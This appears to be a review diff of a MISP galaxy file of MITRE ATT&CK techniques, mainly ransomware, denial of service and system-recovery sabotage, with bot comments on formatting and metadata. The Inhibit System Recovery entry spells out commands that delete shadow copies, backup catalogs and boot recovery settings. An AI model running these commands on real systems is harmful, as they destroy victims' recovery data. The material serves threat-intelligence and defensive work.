This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)\n\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)", + "meta": { + "external_id": "T1486", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "Kernel drivers", + "File monitoring", + "Process command-line parameters", + "Process monitoring" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1486", + "https://www.us-cert.gov/ncas/alerts/TA16-091A", + "https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html", + "https://www.us-cert.gov/ncas/alerts/TA17-181A", + "https://www.us-cert.gov/ncas/alerts/AA18-337A" + ] + }, + "uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "value": "Data Encrypted for Impact - T1486" + }, + { + "description": "The mobile device may be targeted for exploitation through its interface to cellular networks or other radio interfaces.\n\n### Baseband Vulnerability Exploitation\n\nA message sent over 
a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi(Citation: ProjectZero-BroadcomWiFi) or other) to the mobile device could exploit a vulnerability in code running on the device(Citation: Register-BaseStation)(Citation: Weinmann-Baseband).\n\n### Malicious SMS Message\n\nAn SMS message could contain content designed to exploit vulnerabilities in the SMS parser on the receiving device(Citation: Forbes-iPhoneSMS). An SMS message could also contain a link to a web site containing malicious content designed to exploit the device web browser. Vulnerable SIM cards may be remotely exploited and reprogrammed via SMS messages(Citation: SRLabs-SIMCard).",
 "meta": {
 "external_id": "T1477",
 "kill_chain": [
@@ -3862,6 +3921,7 @@
 ],
 "refs": [
 "https://attack.mitre.org/techniques/T1477",
+ "https://googleprojectzero.blogspot.com/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html",
 "http://www.theregister.co.uk/2015/11/12/mobile_pwn2own1/",
 "https://www.usenix.org/system/files/conference/woot12/woot12-final24.pdf",
 "http://www.forbes.com/2009/07/28/hackers-iphone-apple-technology-security-hackers.html",
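Review bot: The new "Data Encrypted for Impact - T1486" object added in this hunk is the first entry in view whose `kill_chain` uses the phase `"mitre-attack:impact"`, and a MISP galaxy only recognises tactic names that appear in the `kill_chain_order` of the companion galaxy definition (galaxies/mitre-attack-pattern.json, not part of this diff). If that definition has not been extended with `impact` in the same series, MISP will load the cluster but the new Impact techniques (T1486 here, T1498/T1499 further down) will not be attributable to any tactic in the matrix view, so the galaxy file should be checked or bumped alongside this cluster. The citation keys in the new description (US-CERT Ransomware 2016, FireEye WannaCry 2017, US-CERT NotPetya 2017, US-CERT SamSam 2018) line up one-to-one with the four `refs` URLs added below them, which is the consistency a reviewer wants to see for generated ATT&CK objects.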
@@ -3871,6 +3931,86 @@ "uuid": "2d646840-f6f5-4619-a5a8-29c8316bbac5", "value": "Exploit via Radio Interfaces - T1477" }, + { + "description": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nA Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS). Many different methods to accomplish such network saturation have been observed, but most fall into two main categories: Direct Network Floods and Reflection Amplification.\n\nTo perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. 
This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)\n\nFor DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).\n\n###Direct Network Flood###\n\nDirect Network Floods are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for Direct Network Floods. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.\n\n###Reflection Amplification###\n\nAdversaries may amplify the volume of their attack traffic by using Reflection. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. 
Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017)\n\nReflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)", + "meta": { + "external_id": "T1498", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "Sensor health and status", + "Network protocol analysis", + "Netflow/Enclave netflow", + "Network intrusion detection system", + "Network device logs" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1498", + "https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html", + "https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf", + 
"https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf", + "https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged", + "https://blog.cloudflare.com/reflections-on-reflections/", + "https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/", + "https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/", + "https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf", + "https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/", + "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf" + ] + }, + "uuid": "d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "value": "Network Denial of Service - T1498" + }, + { + "description": "Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nAn Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. 
These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nBotnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. 
Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)\n\nIn cases where traffic manipulation is used, there may be points in the the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China)\n\nFor attacks attempting to saturate the providing network, see the Network Denial of Service Technique [Network Denial of Service](https://attack.mitre.org/techniques/T1498).\n\n### OS Exhaustion Flood\nSince operating systems (OSs) are responsible for managing the finite resources on a system, they can be a target for DoS. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity. Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018)\n\n#### SYN Flood\nWith SYN floods excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)\n\n#### ACK Flood\nACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. 
This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)\n\n### Service Exhaustion Flood\nDifferent network services provided by systems are targeted in different ways to conduct a DoS. Adversaries often target DNS and web servers, but other services have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.\n\n#### Simple HTTP Flood\nA large number of HTTP requests can be issued to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)\n\n#### SSL Renegotiation Attack\nSSL Renegotiation Attacks take advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. 
Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)\n\n### Application Exhaustion Flood\nWeb applications that sit on top of web server stacks can be targeted for DoS. Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust resources and deny access to the application or the server itself.(Citation: Arbor AnnualDoSreport Jan 2018)\n\n### Application or System Exploitation\nSoftware vulnerabilities exist that when exploited can cause an application or system to crash and deny availability to users.(Citation: Sucuri BIND9 August 2015) Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition.", + "meta": { + "external_id": "CAPEC-125", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "SSL/TLS inspection", + "Web logs", + "Web application firewall logs", + "Network intrusion detection system", + "Network protocol analysis", + "Network device logs", + "Netflow/Enclave netflow" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1499", + "https://capec.mitre.org/data/definitions/227.html", + "https://capec.mitre.org/data/definitions/131.html", + "https://capec.mitre.org/data/definitions/130.html", + "https://capec.mitre.org/data/definitions/125.html", + "https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html", + "https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf", + 
"https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged", + "https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/", + "https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf", + "https://www.cloudflare.com/learning/ddos/syn-flood-ddos-attack/", + "https://www.corero.com/resources/ddos-attack-types/syn-flood-ack.html", + "https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/", + "https://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-new", + "https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html", + "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf" + ] + }, + "uuid": "c675646d-e204-4aa8-978d-e3d6d65885c4", + "value": "Endpoint Denial of Service - T1499" + }, { "description": "This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.\n\nA technique to push an [iOS](https://www.apple.com/ios) or [Android](https://www.android.com) MMS-type message to the target which does not require interaction on the part of the target to be successful. (Citation: BlackHat Stagefright) (Citation: WikiStagefright)", "meta": { 
@@ -3886,7 +4026,7 @@
 "value": "Push-notification client-side exploit - T1373"
 },
 {
- "description": "The use of software, data, or commands to take advantage of a weakness in an Internet-facing computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL) (Citation: NVD CVE-2016-6662), standard services (like SMB (Citation: CIS Multiple SMB Vulnerabilities) or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services. (Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).\n\nFor websites and databases, the OWASP top 10 gives a good list of the top 10 most common web-based vulnerabilities. (Citation: OWASP Top 10)",
+ "description": "The use of software, data, or commands to take advantage of a weakness in an Internet-facing computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL) (Citation: NVD CVE-2016-6662), standard services (like SMB (Citation: CIS Multiple SMB Vulnerabilities) or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services. (Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities. (Citation: OWASP Top 10) (Citation: CWE top 25)",
 "meta": {
 "external_id": "T1190",
 "kill_chain": [
@@ -3908,7 +4048,8 @@
 "https://nvd.nist.gov/vuln/detail/CVE-2016-6662",
 "https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/",
 "https://nvd.nist.gov/vuln/detail/CVE-2014-7169",
- "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project"
+ "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project",
+ "https://cwe.mitre.org/top25/index.html"
 ]
 },
 "uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
@@ -4096,7 +4237,7 @@
 "value": "System Owner/User Discovery - T1033"
 },
 {
- "description": "An adversary could use knowledge of the techniques used by security software to evade detection. For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed \"su\" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection as described by Rastogi et al. (Citation: Rastogi).\n\nBrodie (Citation: Brodie) describes limitations of jailbreak/root detection mechanisms.\n\nTan (Citation: Tan) describes his experience defeating the jailbreak detection used by the iOS version of Good for Enterprise.",
+ "description": "An adversary could use knowledge of the techniques used by security software to evade detection(Citation: Brodie)(Citation: Tan). For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed \"su\" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection(Citation: Rastogi).",
 "meta": {
 "external_id": "EMM-5",
 "kill_chain": [
@@ -4109,9 +4250,9 @@
 "refs": [
 "https://attack.mitre.org/techniques/T1408",
 "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-5.html",
- "http://pages.cs.wisc.edu/~vrastogi/static/papers/rcj13b.pdf",
 "https://media.blackhat.com/eu-13/briefings/Brodie/bh-eu-13-lacoon-attacks-mdm-brodie-wp.pdf",
- "http://www.blackhat.com/us-16/briefings.html#bad-for-enterprise-attacking-byod-enterprise-mobile-security-solutions"
+ "http://www.blackhat.com/us-16/briefings.html#bad-for-enterprise-attacking-byod-enterprise-mobile-security-solutions",
+ "http://pages.cs.wisc.edu/~vrastogi/static/papers/rcj13b.pdf"
 ]
 },
 "uuid": "b332a960-3c04-495a-827f-f17a5daed3a6",
@@ -4285,6 +4426,32 @@ "uuid": "c5089859-b21f-40a3-8be4-63e381b8b1c0", "value": "Modify System Partition - T1400" }, + { + "description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)\n", + "meta": { + "external_id": "T1500", + "kill_chain": [ + "mitre-attack:defense-evasion" + ], + "mitre_data_sources": [ + "Process command-line parameters", + "Process monitoring", + "File monitoring" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1500", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/windows-app-runs-on-mac-downloads-info-stealer-and-adware/" + ] + }, + "uuid": "cf7b3a06-8b42-4c33-bbe9-012120027925", + "value": "Compile After Delivery - T1500" + }, { "description": "Adversaries may try to get information about registered services. 
Commands that may obtain information about services using operating system utilities are \"sc,\" \"tasklist /svc\" using [Tasklist](https://attack.mitre.org/software/S0057), and \"net start\" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well.", "meta": { 
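Review bot: The new `description` value for T1500 ends with a trailing escaped newline (`...execution framework.(Citation: TrendMicro WindowsAppMac)\n"`), while the other entries added in this series (T1499, T1490) end their descriptions at the final sentence; consumers rendering the galaxy get a stray blank line and the string differs from its siblings for no reason. Trim it to `...(Citation: TrendMicro WindowsAppMac)"`. If this cluster file is produced from the ATT&CK STIX export rather than edited by hand, the trim belongs in the generator's normalisation step instead, so it does not reappear on the next regeneration. The T1500 entry itself is complete within this hunk; the context lines after it belong to the next entry, whose body continues outside the hunk.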
@@ -4597,7 +4764,7 @@ "value": "Credentials in Files - T1081" }, { - "description": "Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. \n\n### Windows\n\nExamples of tools and commands that acquire this information include \"ping\" or \"net view\" using [Net](https://attack.mitre.org/software/S0039).\n\n### Mac\n\nSpecific to Mac, the bonjour protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as \"ping\" and others can be used to gather information about remote systems.\n\n### Linux\n\nUtilities such as \"ping\" and others can be used to gather information about remote systems.", + "description": "Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems. \n\n### Windows\n\nExamples of tools and commands that acquire this information include \"ping\" or \"net view\" using [Net](https://attack.mitre.org/software/S0039). The contents of the C:\\Windows\\System32\\Drivers\\etc\\hosts file can be viewed to gain insight into the existing hostname to IP mappings on the system.\n\n### Mac\n\nSpecific to Mac, the bonjour protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as \"ping\" and others can be used to gather information about remote systems. 
The contents of the /etc/hosts file can be viewed to gain insight into existing hostname to IP mappings on the system.\n\n### Linux\n\nUtilities such as \"ping\" and others can be used to gather information about remote systems. The contents of the /etc/hosts file can be viewed to gain insight into existing hostname to IP mappings on the system.", "meta": { "external_id": "T1018", "kill_chain": [ 
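Review bot: The rewritten T1018 description now presents reading the local hosts file (`C:\\Windows\\System32\\Drivers\\etc\\hosts`, `/etc/hosts`) as a discovery step, but this entry's `mitre_data_sources` array lies outside the hunk, so I cannot confirm it lists `"File monitoring"` next to the process-based sources; the T1202 hunk in this same commit adds `"File monitoring"` when its text gained a file-based angle, and this entry should be checked for the same. The new sentence also keeps a stray space ahead of the section separator (`...about remote systems. \n\n### Windows`) that the T1202 and T1133 descriptions in this commit do not have. The enclosing entry's `meta` block continues past the end of the hunk.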
@@ -4622,13 +4789,14 @@ "value": "Remote System Discovery - T1018" }, { - "description": "Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these utilities for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106).", + "description": "Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. 
(Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n\nAdversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.", "meta": { "external_id": "T1202", "kill_chain": [ "mitre-attack:defense-evasion" ], "mitre_data_sources": [ + "File monitoring", "Process monitoring", "Process command-line parameters", "Windows event logs" 
@@ -4842,7 +5010,7 @@
 "value": "Private whois services - T1305"
 },
 {
- "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.\n\n### Windows\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.\n\n### Mac\n\nIt's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.",
+ "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. These checks may be built into early-stage remote access tools.\n\n### Windows\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.\n\n### Mac\n\nIt's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.",
 "meta": {
 "external_id": "T1063",
 "kill_chain": [
@@ -4973,6 +5141,34 @@ "uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "value": "Windows Management Instrumentation - T1047" }, + { + "description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete\n* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet\n* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no", + "meta": { + "external_id": "T1490", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "Windows Registry", + "Services", + "Windows event logs", + "Process command-line parameters", + "Process monitoring" + ], + "mitre_platforms": [ + "Windows", + "macOS", + "Linux" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1490", + "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html", + 
"https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html" + ] + }, + "uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "value": "Inhibit System Recovery - T1490" + }, { "description": "Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.", "meta": { @@ -5065,15 +5261,15 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1096", - "http://msdn.microsoft.com/en-us/library/aa364404", - "http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html", - "https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/", "https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea", - "https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/", - "https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore", "https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/", + "http://msdn.microsoft.com/en-us/library/aa364404", + "https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/", + "https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/", + "http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html", "https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/", - "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/" + "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", + "https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore" ] }, "uuid": "f2d44246-91f1-478a-b6c8-1227e0ca109d", 
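Review bot: `mitre_platforms` for the new T1490 entry is written as `"Windows", "macOS", "Linux"`, whereas the other entries added in this series (T1499, T1500) use `"Linux", "macOS", "Windows"`; settle on one order so regenerated data does not churn the diff. The description covers only Windows recovery features (volume shadow copies, the Backup Catalog, boot configuration data), so if macOS and Linux stay in the platform list it is worth confirming the upstream technique genuinely scopes them in rather than the value being inherited. The second hunk on this line (T1096 refs) is a pure reorder and needs nothing.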
